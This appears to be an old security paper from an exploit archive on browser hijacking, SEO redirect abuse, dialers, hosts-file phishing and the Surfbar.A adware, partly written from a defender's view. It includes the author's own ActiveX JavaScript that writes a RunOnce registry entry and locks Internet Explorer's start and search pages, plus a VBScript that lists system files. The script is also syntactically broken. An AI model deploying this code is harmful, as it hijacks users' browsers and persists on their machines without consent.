Defacing The Art Of Hijacking Spamming And EMail Viruses - A paper analyzing the methodology of hijacking a users web browser focusing mainly on Internet Explorer.
a19d8c74cf6da99ca80f6b3a1494254c3e49702f0a7e4c81583dd174eeb52bf6
0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0
[Defacing The Art Of Hijacking ,Spamming And EMail Viruses]
0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0
[HIJACKERS ART]
[Internet Phenomenon]
RXLabs::Digital Intelligence
http://www.RxLabs.MetaEye.Org
(C) CopyRight
ZeroKnock@MetaEye.org
Aditya@Securitywonks.org
Knowledge Engine Undertaken As:-
Part A
======
[0x01] Abstract.
[0x02] The Methodology Of Hijackers And Virus Writers.
[0x02.1] Example:-SurfbarA
[0x03] Unveiling Hijacking:-
[0x03.1] Techniques.
[0x03.1.1] URL Hijacking.
[0x03.1.2] Redirect Hijacking.
[0x03.1.3] Meta Refreshing Hijacking.
[0x03.1.4] Server Side 302 Redirect in .htaccess
[0x03.1.5] No Follow Hit.
[0x03.1.6] Frame Capturing.
[0x03.1.7] Business Name And URL Hits.
[0x03.1.8] Bad Links Set Up:Domain Splitting
[0x03.2] Modem Hijacking.
[0x03.3] Active X Phishing Hijacking.
[0x03.4] Web Page Hijacking.
[0x03.4.1] Example:-Javascript By:-ZeroKnock
[0x03.5] 302 Redirect Stuffing Hit-Traffic Stealing.
[0x04] How Hijackers Infect The MailBox[Outlook Express]
Part B
======
[0x01] Undertaking HTML Security Tests.
[0x01.1] HTML Security Test Code Snippet.
[0x02] Checking For The Hijacking Of Websites.
[0x02.1] Site Stuffing.
[0x02.2] URL Stuffing.
[0x02.3] Link Stuffing.
[0x02.4] Site Meter Stuffing.
[0x03] Conclusion.
[0x01] Abstract:
Hijacking Is very common phenomenon now a days.Hijacking deeply relates to Browser
Manipulation.I have gone through the stuff quiet many times and found the way this
art sucks the normal functioning of Net Browser hitting mainly INTERNET EXPLORER.
Internet Explorer is now a days undertaken for many vulnerabilities.Microsoft
manages to remove this but it has very unpleasant effect on the working in the
technology world.
[0x02] The Methodology Of Hijackers And Virus Writers:-
=======================================================
Step(A)
Email Spamming:-
---------------
It relates to the art of manipulating Emails with wrong
information sent with it whether cards,porn links , exe ,trojans etc.
Step(B)
Exe Hitting:-
-------------
It means Copying Exe Files To The Target System in any
System folder may be[System /System32] Win Platforms.
Step(C)
Planting Trojans:-
------------------
It relates To setting Trojan Servers on The Target System
for the remote execution of the Flying Commands.
Step(D)
Vulnerability Hit:-
-------------------
It Relates To The Exploitaton Of The Dethroned Vulnerabilty
Of The Browser.
Step(E)
Registry Hit:-
--------------
It Relates To Manipulation In The Registry Keys With
refrence to program designed for execution.
Step(F)
At Last SYSTEM Gets SUCKED!
===========================
Example:- Presenting You an Example Of SURfbarA:-
=================================================
Surfbar.A is drops the DRG.EXE file onto C: drive and runs it.
The DRG.EXE file attempts to download a file called SURFERBAR.DLL from Internet
and puts it to 'C:\Program Files\' folder with WIN32.DLL name. Then this file is
registered to Windows with the RegSrv32.exe utlility.
The WIN32.DLL file is an Internet Explorer plugin. It provides customized search
capabilities and can be also classified as an adware. This adware drops the file
called WINSRV32.EXE to 'C:\Program Files\' folder.
The WINSRV32.EXE file stays in memory and every 10 seconds does the following:
1. Refreshes ITBarLayout value in the following Registry key:
[HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]
2. Changes the startup page of IE to: 'www.surferbar.com' website
3. Constantly creates the following Registry key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\runonce]
"win32" = "c:\\program files\\winsrv32.exe"
These actions make it hard to remove the installed adware from a system, that is
why the WINSRV32.EXE file is classified as a trojan.
[0x03] Unveiling Web Page Hijacking:-
===================================
This relates to browser hacking.It actually means the hacker manipulates
the system registry settings or browser settings which after due course of
time starts malfunctioning i.e. wrong site opening , porn generation ,unhandled
popups etc.
I used to see many unwanted stuff of this kind and from my side i have done
browser hijacking a lot.The Main otive behind this is that you craft some
dirty code which gets repulsive as soon as you download the attachment in mail
,it adheres to the system files and after sometime starts penetrating whether
we call it a virus or manipulator or whatsoever.
[0x03.1]Techniques:-
======================
[0x03.1.1] URL Hijacking:-
==========================
URL Hijacking seems to very fruitful way of hijacking.In this a single URL
is manipulated and redirected to some another URL which results in hijacking
on the fly.
Check The URL:-
www.Hijacker'sDomainName.com/tracker2.php?
url=http://www.YourOwnDomainName.comHere/YourOwnPageURLHere.html
The tracker2.php? in the URL above is the culprit here. It is a click tracking
script often used by affiliate sites to track clicks. If anyone clicks on that
link it will first go to the offenders page and then quickly revert to your own
page. However, this script often uses a 302 redirect which causes Google to think
your page has been temporarily moved to the other site and it gives the PR to that
site, thus increasing their rank and reducing yours. If it is your home page that
was affected it is a very serious matter because the home page PR provides rank
for the rest of your website (Google started removing the PHP tracker links in the
site command in early 2005 so this is less of a problem than it was earlier).
[0x03.1.2] Redirect Hijacking:-
===============================
This is another way of hijacking just similar to URL one but little differnce
In this the inout value of site is changed with the Hijackers choice and the
result is linked to that site which hijacker wants to display as soon as link is
opened.
http://www.<sitename.com>/site.PHP?site=<Manipulated Site Name>.
http://www.kickass.net/site.PHP?site="http://www.Hijacked.net"
As one can clearly look how the redirection is possible if domain is undertaken
If you think of using any ID number its good because if you refreh the page it moves
so fast that it wont display but that does not mean site wont be redirected.
[0x03.1.3] Meta Refreshing:-
============================
This is yet another way of hijacking.In this
Sometimes the URL will look innocent but will go to the dishonest site and there
will be code on that site that will redirect to your site with a Meta Refresh Tag
(automatically redirecting the browser to your site). The Meta Refresh is a favorite
of spammers so search engines are starting to ban sites using them. To see if a site
is using a Meta Refresh, view the code by clicking on view/source in your browser
menu and see if there are any meta refresh tags in the code at the top of that page.
Look for a meta redirect tag set for "0" seconds, that is redirecting to your site,
similar to the following:
meta http-equiv="refresh" content="0"; url=http://www.<SiteName>
[0x03.1.4] Server Side 302 Redirect .htaccess:-
===============================================
A hijacker may also use a Server Side 302 or 302 Redirect in an .htaccess file
telling the server to redirect to your site. A 302 redirect tells the search
engine their site,or page, has moved temporarily to your site and to credit the
content of your site to their site and thus stealing your PR. Many directories use
302 redirects on the links in their directory to track clicks, however it results
in the same problem, because Google is attributing those links to your site and
stealing your PR. You can't tell this is a 302 redirect by just viewing the URL,
you need to copy the link into a server header checker. If the results show this
link is a 302 redirect then the directory may be stealing your page rank. If it
shows a 200, then the page is probably OK (if this search produces an error make
sure there are no breaks in the link).
[0x03.1.5] No Follow Hit:-
============================
A dishonest site that has agreed to trade links with you that has a desire
to lessen outgoing links on their site (to boost their own PR) will sometimes
place a rel="nofollow" in the link itself. This prevents search engines from
following that link. So while it appears that site has linked to your site the
search engines won't benefit your site for the PR it could have gained so check
all reciprocated links carefully for that little bit of code (run your mouse over
the link and check it in the bottom of your browser window).
[0x03.1.6] Frame Capturing:-
============================
Another method that dishonest webmasters use to benefit their own site and
provide no benefit to your own site is to allow you to submit your site but
then they install a code that draws your whole web page (including images and
working links) into a frame so your whole web page is displayed on their
site. This is dishonest because you think they are going to link to your site
but what they are actually doing is using your design and content and displaying
it as their own without your permission. This also steals traffic from your site
because people often see what they wanted to see on the hijacker's site without
even visiting your site.
You also get no benefit of the PR from that link because the link is inside a frame
on their site which most search engines can't read but for those search engines
that can read what is inside frames your site may be penalized for duplicate content
(this can result in "Supplemental Results" being tagged on the end of your listing
in the search engines).
HijackersWebSiteURLgoeshere/opensite.cfm?site=
www.YourWebSiteURLGoesHere.comandYourIDnumbergoes hereID=____, etc.
Check Out A Little Script.
<script type="text/javascript">
if(top!= self) top.location.href = self.location.href
</script>
[0x03.1.7] Business Conventions And URLs:-
==========================================
Often directories, now called Scraper Directories (that you may have submitted
to yourself) will take your page (if it's ranking well in the search engines)
and set up a separate page with your business name in the title and/or your URL
and also your most important text on your page that brings keyword rank to your
site. This is blatant content theft because it not only results in them competing with
your site for your business.
[0x03.1.8] Bad Links SetUP:- Domain Splitting
=============================================
If you have submitted your site to search engines as www.YourDomain.com and somone
links to your site with just YourDomain.com, i.e., without the WWW in front, Google
will think you have two sites under the same domain and credit you with a duplicate
content penalty (Supplemental Results). This is known as Splitting your Domain.
[0x03.2] Modem Hijacking:-
==========================
Modem hijacking, also referred to as dialer hijacking or Internet dumping, is a
form of fraud that targets dial-up modem users. The scam itself isn't new, but many
Internet users may not be aware of it or know how to avoid it.
Internet users may run into a pop-up or Web page that offers access to a particular
site or various files. Sometimes the Web site may call this a viewer indicating
that you need to download it in order to "view" the content on the site. When the
user clicks 'OK' or agrees to the terms on the pop-up to gain access, scammers can
use ActiveX scripts to download a dialer to the computer with or without the user's
knowledge.
Once the dialer has been downloaded and installed onto the user's computer, it can
drop the user from the dial-up session through his or her ISP and then proceed to
dial a long distance telephone number without the user's knowledge. Other forms of
the dialer may automatically connect to a long distance number while the user's
computer is in an idle state.
These are often international calls and can cost several dollars per minute. As
a result, the user ends up with an unexpected, exorbitant charge on his or her long
distance bill.
[0x03.3] Active X Phishing Hijacking:-
======================================
This type of phishing scam uses a Trojan program which disguises itself as a
legitimate program, but once executed, destroys or scrambles data. The Trojan
arrives in HTML email or can be run on a normal looking Web page. If you have
enabled scripting on your computer (Internet Explorer and Microsoft's Outlook and
Outlook Express email programs enable scripting by default) and you have ActiveX
security settings configured too low (or you are running an out-of-date and/or
unpatched version of Windows), the Trojan installs itself on your computer.
The Trojan then makes changes to the hosts file, a component of Windows that your
browser first looks to when it converts a domain name that you enter (such
as "www.earthlink.net") into the IP address it needs to load a Web page.
By entering an IP address of the phisher's choosing into your hosts file and
associating it with the names of well known Web sites, the phisher can force your
browser -- any browser, not just Internet Explorer -- to go to a fake Web site that
may look like your favorite Web site, but isn't. When you log on, the Phisher will
capture your username and password.
Under normal circumstances, most people do not have any IP addresses listed in their
hosts file, but the file exists just in case you might need to use it. Since most
PC users are unfamiliar with the workings of the hosts file, unless you're running
special software that monitors the hosts file for changes, you may never know it
has been changed until it's too late.
[0x03.4.1] Web Page Hijacking:-
===============================
This Relates how a web page is hijacked.Since i have undergone lot of this.Here
I am providing you with a script that is written by me which hijacks the browser
and permanently sets the Page to BlackHat.com.
Check:-
# Script Written By Zeroknock
#############################
<script language ="JavaScript">
<!--
var Hijack_URL= "http://www.BlackHat.com/main.html";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "exe or js filename";
var Shell= new ActiveXObject("WScript.Shell");
Set A= "HKCU\\Software\\Microsoft\\Internet Explorer";
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\xxx",
filepath);
Shell.RegWrite("A\\Main\\StartPage",Hijack_URL);
Shell.RegWrite("A\\Main\\LocalPage",Hijack_URL);
Shell.RegWrite("A\\Main\SearchPage",Hijack_URL);
Shell.RegWrite("A\\Main\\Use SearchAsst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom
Search URL",1,"REG_DWORD");
-->
</script>
Its so easy to write a code if you know the defined characteristics of the system.
[0x03.5] 302 Redirect Stuffing : Traffic Stealing:-
====================================================
This is quiet different.The hijackers inject a 302 redirect web page to steal traffic from
your website.what happens in this is that all the incoming traffic seems to be getting towards
hijacker defined we page.The hijackesr undertake the defined benefit from your site i.e. the
rank you have been endorsed on the search engine.in case you can be penalised for using
302 redirect web page.So this is considered to be a basic problem.
Part B
[0x01] Performing HTML Security Tests:-
==========================================
In this i will going to explain the stuff regarding to HyPer Text MarkUP Language security
text.This test relates to dethrone the bug if found in the language during coding of the
web page.
[0x01.1]The Code Scenario:-
============================
HTML Security Test::::.[*]ZeroKnock[*]
This Is Basically Designed To Check The Effect OF ActiveX Controls.If Alert Occurs then System
Is Under Security Treatment But At Same Time The [*]Sccrun.dll[*] Is Present showing Vulnerability
In Engine.
<script language="VBScript">
<!--
Dim FSO,fFolder,fFiles,file_instance
Set FSO = CreateObject("Scripting.FileSystemObject")
Set fFolder = FSO.GetFolder("c:\Winnt")
Set fFiles = fFolder.Files
For Each file_instance In fFiles
document.writeln file_instance.Name & "<br>"
Next
-->
</script>
[0x02] Checking For The Hijacking Of Websites:-
===============================================
This section is entirely relates to the cheking of once webpage wheteher it gets hijacked
or not.This is been divided into four defined techniques which is used to check this.
[0x02.1] Site Stuffing:-
========================
String: site:www.Domain.com in Google.
This technique is undertaken to check the availability of once web page in the google
search engine.This shows the web pages of once website.Google recently had disabled
the occurence of 302 redirected webpages.
[0x02.2] URL Stuffing:-
=======================
String: allinurl:www.domain.com
This serach shows the pages of your website and the links that are being provided in your
pages .There can be possibility that redirected pages may contain links tracking codes on
them which can or cannot be 302 redirects.
[0x02.3] Link Stuffing:-
========================
String: link:www.Domain.com:-
This brings up the all the links subjected to your site and necesaary or unnecesary 302
redirects.
[0x02.4] Site Meter Stuffing:-
==============================
This relates to a good site meter that provides referral links to your site.This is done to
ensure flexiblity in web penetration testing.
[0x03] Conclusion : No Patch For Ignorance.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed